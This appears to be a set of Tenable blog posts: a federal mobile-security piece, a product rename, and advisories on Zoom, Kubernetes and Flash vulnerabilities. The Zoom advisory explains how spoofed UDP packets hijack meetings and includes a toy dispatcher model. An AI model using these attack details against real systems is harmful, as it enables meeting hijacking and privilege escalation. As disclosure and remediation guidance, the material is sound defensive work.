<h2>The CDM DEFEND mobile device management process</h2>
<p>The CDM Program Office envisions the awardees first ensuring their MDM meets or exceeds CDM-compliant security benchmarks. Once that is accomplished, DHS, through the CDM DEFEND Request for Service (RFS) process, will partner to integrate Federal agency mobile security solutions into the overall CDM scheme. The MDM data will eventually flow up to the CDM Agency Dashboard, providing a more complete picture of the agency’s security posture by including the ever-growing number of mobile devices.</p>
<p>More than any other technology area, the mobile security challenge is complicated by the ways different agencies handle mobile. Some agencies standardize on a single platform, while others offer different handset and connection options to meet the needs of their various component sub-agencies. </p>
<p>“Bring Your Own Device” (BYOD) introduces challenges of non-standard hardware, operating systems and applications. Without vigilant security solutions in place, mobility increases the attack surface, widening the Cyber Exposure gap of the entire agency enterprise. The overarching goal of the DHS CDM Program Office is to overcome the security challenges of the federal enterprise. By adding visibility into the hardware, software, configuration and vulnerabilities of mobile assets, the four areas covered by the original CDM program, the program will increase cybersecurity across the Federal spectrum. The CDM PMO plans to accomplish this in a step-by-step, programmatic fashion:</p>
<ul><li>Complete assessments of agency mobile device management practices</li>
<li>Produce analyses based on best practices and standards in use among federal agencies</li>
<li>Perform gap analyses and drive to close critical gaps</li>
<li>Normalize the cybersecurity data from mobile assets to be incorporated with the rest of CDM data bound for the Dashboards</li>
<li>Add processes to the CDM program reviews, ensuring systems remain current and effective</li></ul>
<p>Will CDM affect the effectiveness of mobility solutions? Possibly, depending on the security solutions the agency chooses. Tenable’s SecurityCenter Continuous View (SC CV) enterprise platform develops vulnerability assessments based on the information in the MDM platform, without connecting directly to the mobile device. Other CDM tools may use MDM data or require agents on the mobile device itself. Tenable took this approach to limit any effect on the device, the enterprise and the user. By leveraging the robust capabilities of their already-installed Tenable SC CV platform, agencies can add “goin’ mobile” to their list of successful CDM efforts.</p>
<p><b><i>To learn more about how Tenable, and its flagship CDM platform Tenable.sc Continuous View, can help your Agency improve its security posture, please visit us at: <a href="https://www.tenable.com/data-sheets/maximize-outcomes-for-cdm-and-much-m...

What’s in a Name? SecurityCenter Is Now Tenable.sc


<p>On November 7, 2018, Tenable SecurityCenter was renamed Tenable.sc. Read on to learn more about why we did it - and catch up on the latest innovations coming to our Cyber Exposure platform.</p>

<p>Earlier this month, when we announced new <a href="https://www.tenable.com/press-releases/tenable-announces-industry-s-firs... Prioritization capabilities</a> coming to the Tenable Cyber Exposure platform, we decided it was also time to give one of our key products a fresh name. As of Nov. 7, 2018, Tenable SecurityCenter was renamed Tenable.sc to better reflect its position as a core element of the Tenable Cyber Exposure platform.</p>

<h2>Redefining SecurityCenter</h2>

<p>For most businesses, the number of vulnerabilities they’re dealing with is simply untenable. In fact, the recent <a href="https://www.tenable.com/cyber-exposure/vulnerability-intelligence">Vulne... Intelligence Report</a> from Tenable Research reveals a 53% increase in vulnerabilities published in 2017 compared with the previous year. Combine this rapidly changing and expanding threat landscape with a huge increase in the amount and types of assets on your network, and it’s clear the risk of business-disrupting events has never been higher. </p>

<p>To keep up with the current volume of vulnerabilities, new assets and changes to the threat landscape, organizations need a solution to holistically assess, manage and measure cyber risk across their modern attack surface. Organizations need <a href="https://www.tenable.com/cyber-exposure">Cyber Exposure</a>. </p>

<p>And that’s why we’re excited to bring Tenable.sc into our <a href="https://www.tenable.com/cyber-exposure/platform">Cyber Exposure platform</a>. This change gives customers flexible deployment options for managing vulnerabilities in their modern organization. They may now choose between Tenable.sc (managed on-prem) or Tenable.io (managed in the Cloud). </p>

<p>So what does this mean for Tenable.sc?</p>

<h2>Innovating Tenable.sc</h2>

<p>Tenable.sc, a key part of our portfolio since its inception in 2003, has continually driven innovation in the vulnerability management market. Now, as a core element of the Tenable Cyber Exposure platform, you will see the solution receive increased innovation and accelerated development to help our customers see more, do more and further reduce their cyber risk. </p>

<h2>Available now</h2>

<p>Last week, we released Tenable.sc 5.8. This release enables our customers to see more, extending beyond the walls of the organization for greater support in an on-prem environment. It includes enhancements to <a href="https://www.tenable.com/blog/securitycenter-innovation-continues-with-5-... Agent Workforce</a> capabilities, such as the ability to:</p>
<ul><li>Speed up DNS calls with the ability to resolve DNS assets in parallel</li>
<li>Modify the severity of vulnerabilities with accept/recast rules for agent data</li>
<li>Get greater flexibility over agent data with the option to set a timeline for expiration of agent repositories</li>
<li>Easily retain user data with the ability to reassign objects for users deleted by admins</li>
<li>Save time with the ability to set a date threshold to import data for agent scans</li>
<li>See key information at a glance with the addition of the scan ID in the component title of PDF reports</li></ul>

<p>For additional information on Tenable.sc 5.8 features and quality fixes check out the <a href="https://docs.tenable.com/releasenotes/securitycenter/securitycenter580.h... notes</a>.</p>

<h2>Coming in 2019</h2>
<p>As we move into the new year, you’ll see significant innovations in Tenable.sc, including:</p>
<ul><li>Integrating SAML to allow for multiple SSO/authentication solutions, such as Shibboleth.</li>
<li>Integration between Tenable.sc and Industrial Security to deliver high-level analysis and reporting of both OT and IT networks found in critical infrastructure. This gives customers a single platform to measure and manage cyber risk across both OT and IT networks.</li>
<li>Advanced <a href="https://www.tenable.com/press-releases/tenable-announces-industry-s-firs... Prioritization</a> capabilities to address the deluge of vulnerabilities and predict which ones will generate the most cyber risk to organizations. Predictive prioritization will provide organizations with the unprecedented capability to reduce the number of critical vulnerabilities they need to remediate by 95%, while maintaining the same level of cyber risk across their attack surface compared to basic prioritization with CVSS. </li>
<li>Integration with <a href="https://www.tenable.com/products/tenable-io/lumin#form">Tenable Lumin</a> for advanced visualization, analytics and measurements to help organizations understand and reduce their Cyber Exposure.</li>
<li>Enhancements and additions to reports and dashboards</li></ul>

<p>So, to answer my original question, what’s in a name? As it turns out, a lot. </p>

<p>We’re excited to bring these innovations to market and bring all our customers along in our Cyber Exposure journey. </p>

<p>Want to learn more about Tenable.sc? Visit the webpage <a href="https://www.tenable.com/products/tenable-sc">https://www.tenable.com/pro...

Tenable Research Advisory: Zoom Unauthorized Command Execution (CVE-2018-15715)


Tenable Researcher David Wells discovered a vulnerability in Zoom’s Desktop Conferencing Application that allows an attacker to hijack screen controls, spoof chat messages or kick and lock attendees out of meetings. Zoom has released updates for macOS and Windows.

  • What you need to know: Tenable Research has discovered a vulnerability in Zoom’s Desktop Conferencing Application.
  • What’s the attack vector? Unauthorized command execution via Zoom’s Event messaging pump.
  • What’s the business impact? Attackers could hijack control of presenters’ desktops, spoof chat messages and kick attendees out of Zoom calls.
  • What’s the solution? Zoom has released an update for the Desktop Conferencing Application.

Background

Tenable has discovered a vulnerability, CVE-2018-15715, in Zoom's Desktop Conferencing Application that allows for execution of unauthorized Zoom commands like spoofing chat messages, hijacking screen controls and kicking attendees off calls and locking them out of meetings. This vulnerability could be exploited in a few scenarios: 1) a Zoom meeting attendee could go rogue; 2) an attacker on the local area network (LAN) or 3) a remote attacker over the wide area network (WAN) could theoretically use this vulnerability to hijack an ongoing Zoom meeting. We weren’t able to completely test scenario three, which is more complicated and will be discussed in detail later.

Analysis

This bug is due to the fact that Zoom's internal messaging pump (util.dll!ssb::events_t::loop) dispatches both client User Datagram Protocol (UDP) and server Transmission Control Protocol (TCP) messages (from util.dll!ssb::select_t::loop) to the same message handler in ssb_sdk.dll. This allows an attacker to craft and send UDP packets which get interpreted as messages processed from the trusted TCP channel used by authorized Zoom servers.

This attack can be carried out not only by attendees of the Zoom meeting but by any remote attacker able to craft a spoofed UDP packet, since they can then seamlessly slip into the existing UDP session for an ongoing Zoom meeting and trigger this bug. This impacts both one-on-one (P2P) meetings and group meetings streamed through Zoom servers. It’s also worth mentioning that an attacker could theoretically exploit this vulnerability over WAN if they have the ability to spoof a public IP source in a UDP packet. In this scenario, the remote attacker could exploit this vulnerability by spoofing the WAN IP and trivially brute-forcing the source port the victim is using for the UDP session with the Zoom server while the meeting is live.

This vulnerability allows an attacker (over LAN or WAN) or rogue attendee to:

  1. Hijack screen controls: Bypassing screen control permissions during remote attendee screen share and sending keystrokes and mouse movements to completely control the desktop.
  2. Spoof chat messages: Sending chat messages impersonating other users on the conference.
  3. Kick attendees off the conference: Kicking and locking out attendees even when the attacker is not the meeting host.

By exploiting this vulnerability, an attacker could not only hijack the presenter’s screen and open the calculator (as shown in the video linked below), but also could download and execute malware. The practical execution of such an attack would have to overcome UDP packet loss (losing keystroke packets) and interruption of keystroke sequence by the victim.
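The root cause described above, one message pump that merges an unauthenticated peer channel with an authenticated server channel and then dispatches on message type alone, can be shown with a small model. This is an added example written for this post, not Zoom code; the channel names, command names and handler classes are constructed, and the hardened variant shows the defensive fix of carrying the channel of origin with every message.

```python
"""Toy model of the dispatch flaw described above (constructed, not Zoom code).

One event loop feeds messages from the unauthenticated peer (UDP) channel and
the authenticated server (TCP) channel to a single handler.  The vulnerable
handler keys on message kind alone, so a privileged command injected on the
peer channel is honoured.  The hardened handler keeps the channel of origin.
"""
from dataclasses import dataclass
from enum import Enum, auto

class Channel(Enum):
    UDP_PEER = auto()     # media traffic; any host reaching the socket can inject
    TCP_SERVER = auto()   # authenticated control channel to the service

# Command kinds reserved for the control channel (invented names covering the
# capabilities the advisory lists: screen control, chat, removing attendees).
PRIVILEGED = {"grant_remote_control", "chat", "remove_attendee"}
UNPRIVILEGED = {"media_frame", "keepalive"}

@dataclass(frozen=True)
class Message:
    kind: str
    sender: str
    channel: Channel

class VulnerableHandler:
    """Dispatches on message kind alone; where the message came from is lost."""
    def __init__(self):
        self.accepted = []
    def handle(self, msg: Message) -> bool:
        if msg.kind in PRIVILEGED or msg.kind in UNPRIVILEGED:
            self.accepted.append(f"{msg.kind} from {msg.sender}")
            return True
        return False

class HardenedHandler:
    """Privileged kinds are honoured only when they arrive on TCP_SERVER."""
    def __init__(self):
        self.accepted = []
        self.rejected = []
    def handle(self, msg: Message) -> bool:
        if msg.kind in PRIVILEGED and msg.channel is not Channel.TCP_SERVER:
            self.rejected.append(f"{msg.kind} via {msg.channel.name} from {msg.sender}")
            return False
        if msg.kind in PRIVILEGED or msg.kind in UNPRIVILEGED:
            self.accepted.append(f"{msg.kind} from {msg.sender}")
            return True
        return False

def run_loop(handler, messages):
    """Single message pump handing both channels to one handler."""
    return [handler.handle(m) for m in messages]

# Constructed traffic: a legitimate server command, a normal media frame,
# and a privileged command injected over the peer channel.
SAMPLE = [
    Message("chat", "server", Channel.TCP_SERVER),
    Message("media_frame", "attendee-a", Channel.UDP_PEER),
    Message("grant_remote_control", "attendee-b", Channel.UDP_PEER),
]

def demo():
    """Run the same traffic through both handlers and return them."""
    vulnerable, hardened = VulnerableHandler(), HardenedHandler()
    run_loop(vulnerable, SAMPLE)
    run_loop(hardened, SAMPLE)
    return vulnerable, hardened

if __name__ == "__main__":
    v, h = demo()
    print("vulnerable accepted:", v.accepted)
    print("hardened accepted:  ", h.accepted)
    print("hardened rejected:  ", h.rejected)
```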

Proof of concept

Wells has developed a proof of concept (PoC) for this vulnerability. In the video PoC below, you can see a rogue meeting attendee sending UDP packets to forcibly take control of the presenter’s screen and open the calculator.

Business impact

Conferencing services like Zoom are becoming ubiquitous in enterprises as teams are distributed around the world. According to Zoom’s website, over 750,000 companies use the enterprise video communication platform. Exploitation of a vulnerability like this could be extremely disruptive and poses serious reputational risk.

Solution

Zoom patched its servers to block part of the attack vector and released version 4.1.34814.1119 to fix the vulnerability in Windows and version 4.1.34801.1116 for macOS. The latest update for the Linux client doesn’t fix the issue and Zoom is reportedly working on an update.

Identifying affected systems

We have verified this vulnerability affects the following Zoom versions:

  • macOS 10.13, Zoom 4.1.33259.0925
  • Windows 10, Zoom 4.1.33259.0925
  • Ubuntu 14.04, Zoom 2.4.129780.0915

Tenable has released a Nessus plugin to identify vulnerable systems, which can be found here for Windows and here for macOS.

Additional information

Learn more about Tenable.io, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.

Kubernetes Privilege Escalation Vulnerability Publicly Disclosed (CVE-2018-1002105)


<p>Patches are available for a critical privilege escalation flaw (CVE-2018-1002105) in the open-source container orchestration system, Kubernetes.</p>

<h2>Background</h2>
<p>On December 3, details about a privilege escalation vulnerability in Kubernetes, the popular open source container orchestration system, <a href="https://github.com/kubernetes/kubernetes/issues/71411">were publicly disclosed by the Kubernetes team</a>. Kubernetes is used to automate the deployment, scaling, and management of containerized applications.</p>

<h2>Vulnerability details</h2>
<p>Designated as CVE-2018-1002105, the vulnerability exists in the proxy handling function of the Kubernetes API server. Arbitrary requests can be made to the backend server via the Kubernetes API server if the requestor is permitted to establish a connection to the API server. According to the Kubernetes team, “all users (authenticated and unauthenticated) are allowed to perform discovery API calls that allow this escalation” through the default configuration.</p>

<p>Additionally, this vulnerability allows for the escalation of Kubernetes pod API requests (exec, attach, portforward) through the kubelet API.</p>

<p>The Kubernetes team notes that, due to the fact that “unauthorized requests are made over an established connection,” the requests won’t appear in the audit or server logs. However, the requests appearing in either the kubelet or aggregated API server logs will be “indistinguishable from correctly authorized and proxied requests via the Kubernetes API server,” making it difficult to detect the use of this vulnerability in your environment.</p>

<h2>Urgently required actions</h2>
<p>System administrators, users or anyone deploying Kubernetes should upgrade to the patched versions immediately. The following versions of Kubernetes are affected by this vulnerability:</p>

<ul><li>Kubernetes v1.0.x-1.9.x</li>
<li>Kubernetes v1.10.0-1.10.10</li>
<li>Kubernetes v1.11.0-1.11.4</li>
<li>Kubernetes v1.12.0-1.12.2</li></ul>

<p>The vulnerability is addressed in the following versions of Kubernetes:</p>

<ul><li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.10.md/#... v1.10.11</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.11.md/#... v1.11.5</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.12.md/#... v1.12.3</a></li>
<li><a href="https://github.com/kubernetes/kubernetes/blob/master/CHANGELOG-1.13.md/#... v1.13.0-rc.1</a></li></ul>

<p>Additionally, users of Red Hat’s OpenShift Container Platform should upgrade to the <a href="https://access.redhat.com/security/cve/cve-2018-1002105">patched versions</a> as soon as possible.</p>

<p>Lastly, please review the security tracker pages for <a href="https://security-tracker.debian.org/tracker/CVE-2018-1002105">Debian</a> and <a href="https://www.suse.com/security/cve/CVE-2018-1002105/">SUSE</a> distributions for up-to-date information on the availability of a Kubernetes patch on these platforms.</p>

<h2>Identifying affected systems</h2>
<p>A list of Nessus plugins to identify this vulnerability will appear <a href="https://www.tenable.com/plugins/search?q=cves%3A(%22CVE-2018-1002105%22)&sort=&page=1">here</a> as they’re released.</p>
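As an added example (not part of the Kubernetes project or of this advisory), the following helper classifies an API server version string against the affected and fixed ranges listed above; the `kubectl version -o json` sample it parses is constructed.

```python
"""Triage helper for CVE-2018-1002105 (added example, not Kubernetes project code).

Classifies a Kubernetes server version against the affected and fixed ranges
in the advisory.  Input is the gitVersion string the API server reports (the
serverVersion.gitVersion field of `kubectl version -o json`).  Vendor build
suffixes such as "-gke.5" or "+abcdef" are ignored; only the numeric
major.minor.patch triple drives the decision.
"""
import json
import re

# Per minor line: first patch level carrying the fix (from the fixed list above).
FIXED_PATCH = {(1, 10): 11, (1, 11): 5, (1, 12): 3}
LAST_UNPATCHED_MINOR = 9    # v1.0.x through v1.9.x received no fix
FIRST_FIXED_MINOR = 13      # v1.13.0-rc.1 and later ship with the fix

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(git_version: str) -> tuple:
    """Return (major, minor, patch) from strings like 'v1.10.9-gke.5'."""
    match = _VERSION_RE.match(git_version.strip())
    if not match:
        raise ValueError(f"unrecognised Kubernetes version: {git_version!r}")
    return tuple(int(part) for part in match.groups())


def is_affected(git_version: str) -> bool:
    """True when the version falls inside an affected range from the advisory."""
    major, minor, patch = parse_version(git_version)
    if major != 1:
        return False                      # advisory covers only the 1.x line
    if minor <= LAST_UNPATCHED_MINOR:
        return True                       # 1.0 .. 1.9: every release affected
    if minor >= FIRST_FIXED_MINOR:
        return False
    fixed = FIXED_PATCH.get((major, minor))
    return fixed is None or patch < fixed


def remediation_target(git_version: str) -> str:
    """Name the patched release from the advisory for an affected version."""
    major, minor, _ = parse_version(git_version)
    if not is_affected(git_version):
        return "not affected"
    if (major, minor) in FIXED_PATCH:
        return f"v{major}.{minor}.{FIXED_PATCH[(major, minor)]}"
    return "no fix in this minor line; upgrade to v1.10.11 or later"


def check_cluster(kubectl_version_json: str) -> dict:
    """Parse `kubectl version -o json` output and classify the server."""
    server = json.loads(kubectl_version_json)["serverVersion"]["gitVersion"]
    return {
        "server_version": server,
        "affected": is_affected(server),
        "upgrade_to": remediation_target(server),
    }


# Constructed sample output; the server here runs a vendor build of 1.10.9.
SAMPLE_KUBECTL_JSON = json.dumps({
    "clientVersion": {"gitVersion": "v1.12.3"},
    "serverVersion": {"gitVersion": "v1.10.9-gke.5"},
})

if __name__ == "__main__":
    print(check_cluster(SAMPLE_KUBECTL_JSON))
```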

<h2>Get more information</h2>
<ul><li><a href="https://github.com/kubernetes/kubernetes/issues/71411">Kubernetes: proxy request handling in kube-apiserver can leave vulnerable TCP connections</a></li>
<li><a href="https://access.redhat.com/security/cve/cve-2018-1002105">Red Hat: About CVE-2018-1002105</a></li>
<li><a href="https://security-tracker.debian.org/tracker/CVE-2018-1002105">Debian Security Tracker: CVE-2018-1002105</a></li>
<li><a href="https://www.suse.com/security/cve/CVE-2018-1002105/">SUSE Security Tracker: CVE-2018-1002105</a></li></ul>

<p><b><i>Learn more about <a href="https://www.tenable.com/products">Tenable</a>, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a <a href="https://www.tenable.com/products/tenable-io/vulnerability-management/eva... 60-day trial</a> of Tenable.io Vulnerability Management. </i></b></p>

Adobe Flash Vulnerability Can Lead to Code Execution and Asset Takeover (CVE-2018-15982)


Adobe has issued an out-of-band advisory for CVE-2018-15982. Through the use of a maliciously crafted RAR file, an attacker exploiting this vulnerability can take over the machine of users that run it.

Background

Adobe has released an out-of-band security bulletin that includes patches for CVE-2018-15982, a critical arbitrary code execution vulnerability in Adobe Flash which was allegedly used to attack Polyclinic No. 2, which is affiliated with the Presidential Administration of Russia. Users are encouraged to update all applications that incorporate Flash.

Analysis

The attack requires a user to open and run a malicious file that takes advantage of a dangling pointer, allowing the attacker to insert their code into the target’s memory, which Flash then executes. As with most code execution vulnerabilities, this vulnerability establishes a backdoor or similar foothold on the target.

In spear phishing campaigns, attacks are often designed to appear as legitimate emails, documents or tools, such as a Chrome extension that the organization often uses. In this case, attackers created a fake employee survey document that users understandably believed they needed to complete.

[Image: Fake employee survey. Source: 360 Core Security]

Proof of concept

360 Core Security, one of the groups credited by Adobe with discovering this vulnerability, has an excellent technical write-up on how this attack works, and specifically how it was allegedly used against the Polyclinic site.

Once the payload is delivered, it disguises itself as an Nvidia driver application to further obfuscate infection.

[Image: Adobe has issued an out-of-band advisory for CVE-2018-15982. Source: 360 Core Security]

Solution

Adobe’s advisory provides the following information on updating Flash:

  • Adobe recommends users of the Adobe Flash Player Desktop Runtime for Windows, macOS and Linux update to Adobe Flash Player 32.0.0.101 via the update mechanism within the product* or by visiting the Adobe Flash Player Download Center.
  • Adobe Flash Player installed with Google Chrome will be automatically updated to the latest Google Chrome version, which will include Adobe Flash Player 32.0.0.101 for Windows, macOS, Linux and Chrome OS.
  • Adobe Flash Player installed with Microsoft Edge and Internet Explorer 11 for Windows 10 and 8.1 will be automatically updated to the latest version, which will include Adobe Flash Player 32.0.0.101.

*Note: Users who have selected the option to 'Allow Adobe to install updates' will receive the update automatically. Users who do not have the 'Allow Adobe to install updates' option enabled can install the update via the update mechanism within the product when prompted.

Identifying affected systems

A list of Nessus plugins to identify this vulnerability will appear here as they’re released.

Get more information

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface. Get a free 60-day trial of Tenable.io Vulnerability Management.
